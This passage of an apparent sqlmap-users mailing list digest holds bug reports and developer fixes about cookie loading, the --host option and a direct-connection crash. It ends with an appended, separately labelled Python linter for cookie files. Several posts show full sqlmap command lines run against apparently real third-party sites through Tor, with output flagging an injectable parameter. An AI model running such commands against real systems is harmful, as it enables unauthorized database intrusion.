>>>> > > > > Host: <HOST>
>>>> > > > > User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.13 (KHTML, like Gecko)
>>>> > > > > Chrome/0.2.149.6 Safari/525.13
>>>> > > > > Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
>>>> > > > > Accept-Language: en-US,en;q=0.5
>>>> > > > > Accept-Encoding: gzip, deflate
>>>> > > > > Referer: <Referer>
>>>> > > > > Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7
>>>> > > > > Connection: keep-alive
>>>> > > > > Content-Type: application/x-www-form-urlencoded
>>>> > > > > Content-Length: 67
>>>> > > > >
>>>> > > > > <abunchofpostparams>
>>>> > > > >
>>>> > > > >
>>>> > > > > No hints that cookie-file is not in correct format (I've been through this,
>>>> > > > > at least I think I so ;) ).
>>>> > > > >
>>>> > > > > Any insight would be much appreciated.
>>>> > > > >
>>>> > > > > Cheers,
>>>> > > > >
>>>> > > > > Dirk
>>>> > > > >
>>>> > > > >
>>>> > > > > --
>>>> > > > > Miroslav Stampar
>>>> > > > > http://about.me/stamparm
>>>> > > >
>>>> > > > --
>>>> > > > Miroslav Stampar
>>>> > > > http://about.me/stamparm
>>>> > >
>>>> > > --
>>>> > > Miroslav Stampar
>>>> > > http://about.me/stamparm
>>>> > >
>>>> > > --
>>>> > > Miroslav Stampar
>>>> > > http://about.me/stamparm
>>>> >
>>>> > --
>>>> > Miroslav Stampar
>>>> > http://about.me/stamparm
>>>>
>>>> ------------------------------
>>>>
>>>> Message: 6
>>>> Date: Mon, 15 Apr 2013 14:01:01 -0700
>>>> From: <co...@5i...>
>>>> Subject: [sqlmap-users] --host parameter
>>>> To: sql...@li...
>>>> Message-ID: <201...@em...>
>>>> Content-Type: text/plain; charset="utf-8"
>>>>
>>>> Hello,
>>>> the --host doesn't work as expected, or I am doing something wrong:
>>>>
>>>> this works as expected:
>>>>
>>>> ./sqlmap.py --url='http://i.csland.ro/index.php?id=0'
>>>>
>>>> sqlmap/1.0-dev-840ee26 - automatic SQL injection and database takeover tool
>>>> http://sqlmap.org
>>>>
>>>> [!] legal disclaimer: Usage of sqlmap for attacking targets without
>>>> prior mutual consent is illegal. It is the end user's responsibility to
>>>> obey all applicable local, state and federal laws. Developers assume no
>>>> liability and are not responsible for any misuse or damage caused by
>>>> this program
>>>>
>>>> [*] starting at 23:57:15
>>>>
>>>> [23:57:15] [INFO] testing connection to the target URL
>>>> [23:57:15] [INFO] heuristics detected web page charset 'ascii'
>>>> [23:57:15] [INFO] testing if the target URL is stable. This can take a couple of seconds
>>>> [23:57:16] [INFO] target URL is stable
>>>> [23:57:16] [INFO] testing if GET parameter 'id' is dynamic
>>>> [23:57:16] [INFO] confirming that GET parameter 'id' is dynamic
>>>> [23:57:16] [INFO] GET parameter 'id' is dynamic
>>>> [23:57:16] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
>>>> [23:57:16] [INFO] testing for SQL injection on GET parameter 'id'
>>>>
>>>> ....
>>>>
>>>> this doesn't work as expected:
>>>>
>>>> ./sqlmap.py --host='i.csland.ro' --url='http://188.240.236.15/index.php?id=0'
>>>>
>>>> sqlmap/1.0-dev-840ee26 - automatic SQL injection and database takeover tool
>>>> http://sqlmap.org
>>>>
>>>> [!] legal disclaimer: Usage of sqlmap for attacking targets without
>>>> prior mutual consent is illegal. It is the end user's responsibility to
>>>> obey all applicable local, state and federal laws. Developers assume no
>>>> liability and are not responsible for any misuse or damage caused by
>>>> this program
>>>>
>>>> [*] starting at 23:58:03
>>>>
>>>> [23:58:03] [INFO] testing connection to the target URL
>>>> [23:58:03] [CRITICAL] page not found (404)
>>>> it is not recommended to continue in this kind of cases. Do you want to quit and make sure that everything is set up properly? [Y/n]
>>>> [23:58:05] [WARNING] HTTP error codes detected during run:
>>>>
>>>> ............
>>>>
>>>> Of course i.csland.ro resolves to 188.240.236.15. Any idea?
>>>>
>>>> Thanks.
>>>>
>>>> ------------------------------
>>>>
>>>> Message: 7
>>>> Date: Tue, 16 Apr 2013 09:12:05 +1100
>>>> From: ???????? ?????? <vo...@s2...>
>>>> Subject: [sqlmap-users] Sqlmap and direct connect error
>>>> To: sql...@li...
>>>> Message-ID: <C59...@s2...>
>>>> Content-Type: text/plain; charset=us-ascii
>>>>
>>>> Hi!
>>>>
>>>> This bug detected if add direct param.
>>>>
>>>> python sqlmap.py -d "mysql://yakimov:pass@127.0.0.1:3306/tech" -u "http://s25.ru/index.phtml?center=7&id=186" --random-agent --tor --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables --exclude-sysdbs
>>>>
>>>> [01:48:28] [CRITICAL] unhandled exception in sqlmap/1.0-dev-de99717,
>>>> retry your run with the latest development version from the GitHub
>>>> repository. If the exception persists, please send by e-mail to
>>>> 'sql...@li...' or open a new issue at
>>>> 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following
>>>> text and any information required to reproduce the bug. The developers will
>>>> try to reproduce the bug, fix it accordingly and get back to you.
>>>> sqlmap version: 1.0-dev-de99717
>>>> Python version: 2.7.3
>>>> Operating system: posix
>>>> Command line: sqlmap.py -d **************************************************** -u http://s25.ru/index.phtml?center=7&id=186 --random-agent --tor --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables --exclude-sysdbs
>>>> Technique: None
>>>> Back-end DBMS: MySQL (identified)
>>>> Traceback (most recent call last):
>>>>   File "sqlmap.py", line 87, in main
>>>>     start()
>>>>   File "/home/yakimov/sqlmap/lib/controller/controller.py", line 248, in start
>>>>     action()
>>>>   File "/home/yakimov/sqlmap/lib/controller/action.py", line 32, in action
>>>>     setHandler()
>>>>   File "/home/yakimov/sqlmap/lib/controller/handler.py", line 95, in setHandler
>>>>     conf.dbmsConnector.connect()
>>>>   File "/home/yakimov/sqlmap/plugins/dbms/mysql/connector.py", line 38, in connect
>>>>     self.connector = pymysql.connect(host=self.hostname, user=self.user, passwd=self.password, db=self.db, port=self.port, connect_timeout=conf.timeout, use_unicode=True)
>>>>   File "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/__init__.py", line 93, in Connect
>>>>     return Connection(*args, **kwargs)
>>>>   File "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py", line 584, in __init__
>>>>     self._connect()
>>>>   File "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py", line 739, in _connect
>>>>     sock.connect((self.host, self.port))
>>>>   File "/home/yakimov/sqlmap/thirdparty/socks/socks.py", line 365, in connect
>>>>     raise GeneralProxyError((5, _generalerrors[5]))
>>>> GeneralProxyError: (5, 'bad input')
>>>>
>>>> ------------------------------
>>>>
>>>> Message: 8
>>>> Date: Tue, 16 Apr 2013 14:19:18 +0200
>>>> From: Miroslav Stampar <mir...@gm...>
>>>> Subject: Re: [sqlmap-users] --host parameter
>>>> To: co...@5i...
>>>> Cc: SqlMap List <sql...@li...>
>>>> Message-ID: <CA+...@ma...>
>>>> Content-Type: text/plain; charset="iso-8859-1"
>>>>
>>>> Hi.
>>>>
>>>> Thank you for your report and find it fixed with the latest commit [1].
>>>>
>>>> Kind regards,
>>>> Miroslav Stampar
>>>>
>>>> [1] https://github.com/sqlmapproject/sqlmap/commit/6fed1921edf1baaf23a54fbe340ff3781fc05c86
>>>>
>>>> On Mon, Apr 15, 2013 at 11:01 PM, <co...@5i...> wrote:
>>>>
>>>> > Hello,
>>>> > the --host doesn't work as expected, or I am doing something wrong:
>>>> >
>>>> > this works as expected:
>>>> >
>>>> > ./sqlmap.py --url='http://i.csland.ro/index.php?id=0'
>>>> >
>>>> > sqlmap/1.0-dev-840ee26 - automatic SQL injection and database takeover tool
>>>> > http://sqlmap.org
>>>> >
>>>> > [!] legal disclaimer: Usage of sqlmap for attacking targets without
>>>> > prior mutual consent is illegal. It is the end user's responsibility to
>>>> > obey all applicable local, state and federal laws. Developers assume no
>>>> > liability and are not responsible for any misuse or damage caused by
>>>> > this program
>>>> >
>>>> > [*] starting at 23:57:15
>>>> >
>>>> > [23:57:15] [INFO] testing connection to the target URL
>>>> > [23:57:15] [INFO] heuristics detected web page charset 'ascii'
>>>> > [23:57:15] [INFO] testing if the target URL is stable. This can take a couple of seconds
>>>> > [23:57:16] [INFO] target URL is stable
>>>> > [23:57:16] [INFO] testing if GET parameter 'id' is dynamic
>>>> > [23:57:16] [INFO] confirming that GET parameter 'id' is dynamic
>>>> > [23:57:16] [INFO] GET parameter 'id' is dynamic
>>>> > [23:57:16] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
>>>> > [23:57:16] [INFO] testing for SQL injection on GET parameter 'id'
>>>> >
>>>> > ....
>>>> >
>>>> > this doesn't work as expected:
>>>> >
>>>> > ./sqlmap.py --host='i.csland.ro' --url='http://188.240.236.15/index.php?id=0'
>>>> >
>>>> > sqlmap/1.0-dev-840ee26 - automatic SQL injection and database takeover tool
>>>> > http://sqlmap.org
>>>> >
>>>> > [!] legal disclaimer: Usage of sqlmap for attacking targets without
>>>> > prior mutual consent is illegal. It is the end user's responsibility to
>>>> > obey all applicable local, state and federal laws. Developers assume no
>>>> > liability and are not responsible for any misuse or damage caused by
>>>> > this program
>>>> >
>>>> > [*] starting at 23:58:03
>>>> >
>>>> > [23:58:03] [INFO] testing connection to the target URL
>>>> > [23:58:03] [CRITICAL] page not found (404)
>>>> > it is not recommended to continue in this kind of cases. Do you want to quit and make sure that everything is set up properly? [Y/n]
>>>> > [23:58:05] [WARNING] HTTP error codes detected during run:
>>>> >
>>>> > ............
>>>> >
>>>> > Of course i.csland.ro resolves to 188.240.236.15. Any idea?
>>>> >
>>>> > Thanks.
>>>> >
>>>>
>>>> --
>>>> Miroslav Stampar
>>>> http://about.me/stamparm
>>>> -------------- next part --------------
>>>> An HTML attachment was scrubbed...
>>>>
>>>> ------------------------------
>>>>
>>>> Message: 9
>>>> Date: Tue, 16 Apr 2013 14:33:33 +0200
>>>> From: Miroslav Stampar <mir...@gm...>
>>>> Subject: Re: [sqlmap-users] Sqlmap and direct connect error
>>>> To: ???????? ?????? <vo...@s2...>
>>>> Cc: SqlMap List <sql...@li...>
>>>> Message-ID: <CA+9yoX0rxH+=vZuYiArFNZhK1xhwos=SNhMqEmFmnCafw-ot=g...@ma...>
>>>> Content-Type: text/plain; charset="koi8-r"
>>>>
>>>> Hi Vladimir.
>>>>
>>>> Find it "patched" with the latest commit [1]. Basically, those combinations
>>>> should not be allowed (-d and --url; -d and --tor; etc.) and now we've
>>>> added new option validation checks for this kind of cases.
>>>>
>>>> Kind regards,
>>>> Miroslav Stampar
>>>>
>>>> [1] https://github.com/sqlmapproject/sqlmap/commit/c73489aff3861f1cac7de41494a296c1095e141a
>>>>
>>>> On Tue, Apr 16, 2013 at 12:12 AM, ???????? ?????? <vo...@s2...> wrote:
>>>>
>>>> > Hi!
>>>> >
>>>> > This bug detected if add direct param.
>>>> >
>>>> > python sqlmap.py -d "mysql://yakimov:pass@127.0.0.1:3306/tech" -u "http://s25.ru/index.phtml?center=7&id=186" --random-agent --tor --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables --exclude-sysdbs
>>>> >
>>>> > [01:48:28] [CRITICAL] unhandled exception in sqlmap/1.0-dev-de99717, retry
>>>> > your run with the latest development version from the GitHub repository. If
>>>> > the exception persists, please send by e-mail to
>>>> > 'sql...@li...' or open a new issue at
>>>> > 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following
>>>> > text and any information required to reproduce the bug. The developers will
>>>> > try to reproduce the bug, fix it accordingly and get back to you.
>>>> > sqlmap version: 1.0-dev-de99717
>>>> > Python version: 2.7.3
>>>> > Operating system: posix
>>>> > Command line: sqlmap.py -d **************************************************** -u http://s25.ru/index.phtml?center=7&id=186 --random-agent --tor --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables --exclude-sysdbs
>>>> > Technique: None
>>>> > Back-end DBMS: MySQL (identified)
>>>> > Traceback (most recent call last):
>>>> >   File "sqlmap.py", line 87, in main
>>>> >     start()
>>>> >   File "/home/yakimov/sqlmap/lib/controller/controller.py", line 248, in start
>>>> >     action()
>>>> >   File "/home/yakimov/sqlmap/lib/controller/action.py", line 32, in action
>>>> >     setHandler()
>>>> >   File "/home/yakimov/sqlmap/lib/controller/handler.py", line 95, in setHandler
>>>> >     conf.dbmsConnector.connect()
>>... [truncated message content] |
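The --load-cookies exchange quoted in this digest turns on three properties of a Netscape-format cookies line: seven tab-separated fields, a subdomain flag that must agree with a leading dot on the domain (the `assert domain_specified == initial_dot` in the traceback), and an expiry of 0 as wget writes for session cookies. The linter below is an added example, not code from the thread or from sqlmap; the function names, finding codes and `example.test` sample lines are constructed for illustration.

```python
import time

# Finding codes (hypothetical names) and what each means for a loader built on
# Python's cookielib / http.cookiejar MozillaCookieJar, the parser in the traceback.
FINDINGS = {
    "FIELD_COUNT": "line does not have 7 tab-separated fields",
    "BAD_BOOLEAN": "flag fields must be the literal TRUE or FALSE",
    "DOT_FLAG_MISMATCH": "subdomain flag disagrees with the leading dot on the "
                         "domain (trips 'assert domain_specified == initial_dot')",
    "SESSION_ZERO": "expiry 0: written by wget for session cookies, but 0 is in "
                    "the past, so an expiry check reports the cookie as expired",
    "EXPIRED": "expiry timestamp is in the past",
    "BAD_EXPIRY": "expiry is not an integer UNIX timestamp",
}


def lint_cookie_line(line, now=None):
    """Return the list of finding codes for one line of a cookies file."""
    now = time.time() if now is None else now
    line = line.rstrip("\r\n")
    # Blank lines and comment lines carry no cookie.
    if not line.strip() or line.startswith(("#", "$")):
        return []
    fields = line.split("\t")
    if len(fields) != 7:
        return ["FIELD_COUNT"]
    domain, subdomains, _path, secure, expires, _name, _value = fields
    found = []
    if subdomains not in ("TRUE", "FALSE") or secure not in ("TRUE", "FALSE"):
        found.append("BAD_BOOLEAN")
    if (subdomains == "TRUE") != domain.startswith("."):
        found.append("DOT_FLAG_MISMATCH")
    if expires == "":
        pass  # empty expiry field: session cookie, nothing to compare
    elif not expires.isdigit():
        found.append("BAD_EXPIRY")
    elif int(expires) == 0:
        found.append("SESSION_ZERO")
    elif int(expires) <= now:
        found.append("EXPIRED")
    return found


def lint_cookie_file(text, now=None):
    """Map 1-based line numbers to finding codes, omitting clean lines."""
    report = {}
    for number, line in enumerate(text.splitlines(), start=1):
        found = lint_cookie_line(line, now)
        if found:
            report[number] = found
    return report


# Constructed sample modelled on the shapes discussed in the thread.
SAMPLE = "\n".join([
    "# Netscape HTTP Cookie File",
    "app.example.test\tFALSE\t/\tTRUE\t0\tJSESSIONID\tAAAA",          # session, expiry 0
    "app.example.test\tTRUE\t/\tTRUE\t9999999999\tJSESSIONID\tAAAA",  # flag vs. dot
    ".example.test\tTRUE\t/\tFALSE\t1429089794\tMUID\tBBBB",          # well formed
    ".example.test\tTRUE\t/\tFALSE\t1300000000\tOLD\tCCCC",           # already expired
    "app.example.test FALSE / TRUE 0 JSESSIONID AAAA",                 # blanks, not tabs
])

if __name__ == "__main__":
    for number, codes in sorted(lint_cookie_file(SAMPLE, now=1366000000).items()):
        for code in codes:
            print("line %d: %s: %s" % (number, code, FINDINGS[code]))
```

Passing a fixed `now` keeps the result reproducible; without it the current time is used and the 1429089794 line is also reported as expired.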